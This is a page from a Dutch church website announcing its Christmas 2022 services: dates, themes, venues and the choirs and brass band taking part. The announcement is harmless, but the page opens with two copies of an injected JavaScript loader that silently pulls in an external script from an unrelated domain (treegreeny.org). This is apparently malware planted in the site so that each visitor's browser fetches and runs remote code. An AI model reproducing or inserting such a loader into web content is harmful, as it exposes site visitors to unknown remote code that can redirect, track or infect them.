;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Programma Kerst 2022 - PKN Damwâld

Programma Kerst 2022

Gepubliceerd op: zondag 18 december 2022

Rond de kerst zijn er weer een aantal speciale diensten:

De kerstnachtdienst op 24 december begint om 21:00 uur in de Ontmoeting. Het thema is: “HOUD MOED – HEB LIEF”. Medewerking wordt verleend door de “Bliid Boadskipsjongers” en de brassband “Ere zij God”. Kerk is open vanaf 20.00 uur, chocolademelk en koffie staat klaar.

Op Eerste Kerstdag is er een kerstdienst om 9:30 uur in de Ontmoeting medewerking wordt verleend door Sign en de kindernevendienst Blits.

De interkerkelijke Kerstviering op 26 december a.s. wordt om 09.30 uur gehouden in de nieuwe sporthal “de Campus”, aan de Badhúswei te Damwâld. Het thema dit jaar luidt:
“Geen Kerst …………….. zonder Hoop”. Deze dienst staat o.l.v. ds. Roelof Akse. Muzikale medewerking wordt verleend door Brassband “Ere zij God” en Chr. Mannenkoor Westerlauwers uit Buitenpost”. Er is oppas aanwezig.

Iedereen van harte welkom!